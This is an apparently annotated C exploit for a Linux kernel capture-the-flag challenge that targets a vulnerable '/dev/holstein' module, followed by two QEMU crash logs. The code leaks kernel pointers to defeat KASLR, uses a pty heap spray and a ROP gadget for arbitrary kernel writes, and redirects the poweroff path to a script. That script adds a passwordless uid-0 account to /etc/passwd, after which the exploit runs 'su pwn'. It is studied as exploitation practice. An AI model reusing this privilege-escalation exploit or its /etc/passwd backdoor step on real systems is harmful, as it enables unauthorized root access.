pwnable_lk01-2_exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
/* 0xffffffff810477f7 : mov qword ptr [rdx], rcx ; ret */
#define module "/dev/holstein"
#define base_no_kaslr 0xffffffff81000000
#define modprobe 0xffffffff81e38180 // /sbin/modprobe
#define poweroff (kbase + 0xe379c0) // /sbin/poweroff
#define orderly_poweroff (kbase + 0x750e4)
#define orderly_reboot (kbase + 0x750e0)
#define mov_qword_rdx_rcx 0xffffffff810477f7
/* State shared between main() and arb_write(); all of it is filled in by main(). */
unsigned long kbase;   /* kernel text base derived from the leaked pointer at buf+0x418 */
unsigned long g_buf;   /* presumably the kernel address of the module's own buffer (leak at buf+0x438 minus 0x438) */
int fd;                /* descriptor for the vulnerable device (see the `module` macro) */
int spray[100];        /* /dev/ptmx descriptors, 50 opened before and 50 after the module */
char buf[0x500];       /* user-side staging area for read()/write() on the device */
/* Rebase an address taken from the non-relocated kernel image (base_no_kaslr)
 * onto the running kernel's leaked base. The distance from base_no_kaslr is
 * preserved; kbase must already have been set by main(). */
unsigned long offsetter(unsigned long addr)
{
    unsigned long image_offset = addr - base_no_kaslr;
    return image_offset + kbase;
}
/*
 * arb_write: store the 32-bit `value` (zero-extended to a qword) at kernel
 * address `address`, using the device and the sprayed pty descriptors.
 *
 * Two steps. First a payload is staged in the shared `buf`: qword slot 12
 * (byte offset 0x60) receives the KASLR-rebased address of the
 * `mov qword ptr [rdx], rcx ; ret` gadget named in the comment above the
 * macros, the qword at 0x418 receives g_buf, and the first 0x420 bytes are
 * written to the device. Second, ioctl() is issued on all 100 sprayed
 * /dev/ptmx descriptors with cmd = value and arg = address. The crash traces
 * at the end of this file show such an ioctl reaching tty_ioctl with RCX
 * holding the cmd and RDX the arg, which is how a store through the gadget
 * lands on `address` — inferred from those traces, not from code visible here.
 *
 * Preconditions: kbase and g_buf set, spray[] holding open descriptors
 * (all done in main). Neither the write() nor the ioctl() results are
 * checked, so a failed staging write goes unnoticed.
 */
void arb_write(unsigned long address, unsigned int value){
unsigned long *writer = (unsigned long*)&buf;
writer[12] = offsetter(mov_qword_rdx_rcx); // slot 12 == byte offset 0x60; rebased for KASLR
*(unsigned long*)&buf[0x418] = g_buf;
write(fd, buf, 0x420); // return value not checked
for (int i=0; i<100; i++){ioctl(spray[i], value, address);} // cmd = value, arg = address
}
/* Returns true when addr is NOT aligned to 1 MiB (0x100000) and false when
 * it is. The sense is inverted relative to the name: main() treats a true
 * result as a bad leak, presumably because a relocated kernel base is
 * expected to sit on a 1 MiB boundary. */
bool valid(unsigned long addr)
{
    const unsigned long low_bits = addr & (0x100000UL - 1);
    return low_bits != 0;
}
/*
 * Entry point. Order of operations: open half of the pty spray, open the
 * device, open the other half, read the device buffer to leak two kernel
 * pointers, patch a kernel string four bytes at a time via arb_write(), then
 * stage a second payload and trigger it with one more ioctl burst. The
 * sequence is order-sensitive (spray halves around the open, leak before any
 * write), so it is annotated here rather than restructured.
 *
 * Observable footprint, for anyone monitoring such a host: ~100 /dev/ptmx
 * opens from one process, a 0x500-byte read and 0x420-byte writes to the
 * device, bursts of ioctls on the ptys, a new uid-0 line in /etc/passwd and
 * an `su`.
 *
 * Declared as `int main()` (no prototype); `int main(void)` is the modern form.
 */
int main(){
// First 50 pty descriptors are opened before the device; presumably this
// shapes the heap around the device's allocation — confirm against the challenge.
for(int i=0;i<50;i++){
spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
if (spray[i] == -1){perror("/dev/ptmx"); exit(1);}
}
fd = open(module, O_RDWR);
// perror() appends its own newline after the errno text, so the embedded "\n" prints a blank line.
if (fd < 0){perror("Can't open module \n");exit(1);}
printf("Module Opened \n");
// Remaining 50 pty descriptors are opened after the device.
for(int i=50;i<100;i++){
spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
if (spray[i] == -1){perror("/dev/ptmx"); exit(1);}
}
// Copies 0x500 bytes out of the device; the byte count returned is not
// checked, so a short read would leave stale bytes in buf.
read(fd, buf, 0x500);
// Leak 1: the qword at 0x418 minus a fixed 0xc38880 is taken as the kernel
// text base. The constant is the non-relocated distance of whatever pointer
// sits there; it is not derivable from this file.
kbase = *(unsigned long*)&buf[0x418] - 0xc38880;
// valid() is true when kbase is NOT 1 MiB aligned; comma expression runs perror then exit.
if (valid(kbase) != 0){perror("Not a good leak\n"), exit(-1);}
// Leak 2: the qword at 0x438 is presumably a pointer back into the device's
// own buffer, so subtracting its offset yields the buffer start — confirm.
g_buf = *(unsigned long*)&buf[0x438] - 0x438;
printf("Kernel Base: %lx \n", kbase);
printf("g_buf: %lx \n", g_buf);
// Writes /tmp/manz.sh (appends a uid-0 "pwn" entry to /etc/passwd) and marks
// it executable. Fixed strings only; no untrusted input reaches system().
system("echo -e '#!/bin/sh\necho \"pwn::0:0:root:/root:/bin/sh\" >> /etc/passwd' > /tmp/manz.sh");
system("chmod +x /tmp/manz.sh");
char bad[] = "/tmp/manz.sh"; // 13 bytes including the terminating NUL
// NOTE(review): sizeof(bad) is 13 and i steps by 4, so the last iteration
// (i = 12) reads 4 bytes at bad[12..15] — three bytes past the end of the
// array, which is undefined behaviour; the "Iteration 3" line of the second
// crash log below shows stack bytes following the 0x00 terminator. The
// comparison is also int vs size_t (signed/unsigned), harmless here since i >= 0.
for (int i=0; i<sizeof(bad); i=i+4){
// Target is the kernel's /sbin/poweroff string (poweroff macro: kbase + 0xe379c0).
unsigned long add = poweroff + i;
printf("Iteration %d: addr = %lx, value = %x\n", i / 4, add , *(unsigned int*)&bad[i]);
fflush(stdout);
arb_write(add , *(unsigned int*)&bad[i]);
}
printf("[+] Done Overwriting\n");
fflush(stdout);
// Second payload: slot 12 now holds orderly_reboot. That macro is already
// kbase-relative (see its #define), so it is not passed through offsetter(),
// unlike mov_qword_rdx_rcx which is an absolute non-relocated address — two
// conventions for gadget addresses coexist in this file. orderly_poweroff is
// defined but unused.
unsigned long *w = (unsigned long*)&buf;
w[12] = orderly_reboot;
*(unsigned long*)&buf[0x418] = g_buf;
write(fd, buf, 0x420); // return value not checked
// Trigger; cmd 0xdeadbeef and arg NULL are presumably don't-care values here — confirm.
for (int i=0; i < 100; i++) {ioctl(spray[i], 0xdeadbeef, NULL);}
// Switches to the user added by /tmp/manz.sh; runs only if the above succeeded.
system("su pwn");
close(fd);
return 0;
}
/* First crash
BUG: unable to handle page fault for address: ffffffffdead0c00
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 340d067 P4D 340d067 PUD 340f067 PMD 0
Oops: 0010 [#1] SMP PTI
CPU: 0 PID: 178 Comm: exploit Tainted: G O 5.15.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:0xffffffffdead0c00
Code: Unable to access opcode bytes at RIP 0xffffffffdead0bd6.
RSP: 0018:ffffb0f800197e10 EFLAGS: 00000286
RAX: ffffffffdead0c00 RBX: ffff998e81ce1c00 RCX: 00000000deadbeef
RDX: 00000000cafebabe RSI: 00000000deadbeef RDI: ffff998e81ce1800
RBP: ffffb0f800197ea8 R08: 00000000cafebabe R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000deadbeef
R13: ffff998e81ce1800 R14: 00000000cafebabe R15: ffff998e81d41300
FS: 0000000000408e38(0000) GS:ffff998e82400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffdead0bd6 CR3: 0000000001be4000 CR4: 00000000003006f0
Call Trace:
? tty_ioctl+0x38a/0x920
? _copy_from_user+0x2e/0x60
? module_write+0x10d/0x135 [vuln]
__x64_sys_ioctl+0x3c3/0x8f0
? vfs_write+0xa5/0x260
? ksys_write+0x53/0xd0
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
*/
/* Second crash
Iteration 0: addr = ffffffff88a379c0, value = 706d742f
Iteration 1: addr = ffffffff88a379c4, value = 6e616d2f
Iteration 2: addr = ffffffff88a379c8, value = 68732e7a
Iteration 3: addr = ffffffff88a379cc, value = ce29fd00
BUG: unable to handle page fault for address: ffffffff810750e4
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 340d067 P4D 340d067 PUD 340e063 PMD 0
Oops: 0010 [#1] SMP PTI
CPU: 0 PID: 165 Comm: exploit Tainted: G O 5.15.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:0xffffffff810750e4
Code: Unable to access opcode bytes at RIP 0xffffffff810750ba.
RSP: 0018:ffffb28cc0187e10 EFLAGS: 00000286
RAX: ffffffff810750e4 RBX: ffff98c0c1cffc00 RCX: 00000000cafebabe
RDX: 0000000000000000 RSI: 00000000cafebabe RDI: ffff98c0c1cff800
RBP: ffffb28cc0187ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000cafebabe
R13: ffff98c0c1cff800 R14: 0000000000000000 R15: ffff98c0c1ce9700
FS: 0000000000409e78(0000) GS:ffff98c0c2400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff810750ba CR3: 0000000001b84000 CR4: 00000000003006f0
Call Trace:
? tty_ioctl+0x38a/0x920
? _copy_from_user+0x2e/0x60
? module_write+0x10d/0x135 [vuln]
__x64_sys_ioctl+0x3c3/0x8f0
? vfs_write+0xa5/0x260
? ksys_write+0x53/0xd0
do_syscall_64+0x43/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x401b15
Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 10 00 00 00 48 89 44 24 08 48 8d 44 24 20 48 89 44 24 10 b8 10 00 00 00 0f 05 <48> 63 f8 e8 73 ff ff ff 48 8b 54 24 18 64 48 2b 14 25 28 00 00 00
RSP: 002b:00007ffe8435b0e0 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00000000004012bd RCX: 0000000000401b15
RDX: 0000000000000000 RSI: ffffffffcafebabe RDI: 0000000000000036
RBP: 00007ffe8435b160 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffe8435b1e8
R13: 00007ffe8435b1f8 R14: 0000000000000000 R15: 0000000000000000
Modules linked in: vuln(O)
CR2: ffffffff810750e4
---[ end trace 7892d13966c73b7d ]---
RIP: 0010:0xffffffff810750e4
Code: Unable to access opcode bytes at RIP 0xffffffff810750ba.
RSP: 0018:ffffb28cc0187e10 EFLAGS: 00000286
RAX: ffffffff810750e4 RBX: ffff98c0c1cffc00 RCX: 00000000cafebabe
RDX: 0000000000000000 RSI: 00000000cafebabe RDI: ffff98c0c1cff800
RBP: ffffb28cc0187ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000cafebabe
R13: ffff98c0c1cff800 R14: 0000000000000000 R15: ffff98c0c1ce9700
FS: 0000000000409e78(0000) GS:ffff98c0c2400000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff810750ba CR3: 0000000001b84000 CR4: 00000000003006f0
Kernel panic - not syncing: Fatal exception
Kernel Offset: 0x6c00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
*/